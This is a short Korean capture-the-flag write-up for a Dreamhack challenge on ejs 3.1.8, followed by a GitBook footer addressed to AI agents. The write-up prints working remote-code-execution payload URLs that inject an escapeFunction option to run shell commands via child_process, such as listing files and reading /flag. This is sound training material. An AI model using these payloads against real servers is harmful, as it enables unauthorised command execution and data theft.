> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/dreamhack/dreamhack-ejs-3.1.8.md). # \[Dreamhack] ejs\@3.1.8 {% embed url="" %} 여기 페이로드 그대로 있고 ``` http://[할당받은 서버 주소랑 포트]/?name=John&settings[view options][client]=true&settings[view options][escapeFunction]=1;return global.process.mainModule.constructor._load('child_process').execSync('ls'); ``` 로 수정해서 풀면 된다.\ 해당 poc는 윈도우 명령어를 썼는데 우리는 서버를 작동시켜야하니까 리눅스 명령어로 변경해서 페이로드를 짜주면 되고 존재하는 CVE니까 그대로 가져다 쓰면 쉘이 따진다.\ \ 에러가 터지면서 파일이 다운로드 되고 쉘이 따지는걸 확인하면 ``` http://[할당받은 서버 주소랑 포트]/?name=John&settings[view options][client]=true&settings[view options][escapeFunction]=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag'); ``` 로 플래그를 다운받을 수 있다! 문제가 출제된 당시에는 0-day 취약점이었지만, 시간이 흘러 1-day 취약점 문제가 되었다. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.cooku222.kr/security/web-hacking/dreamhack/dreamhack-ejs-3.1.8.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.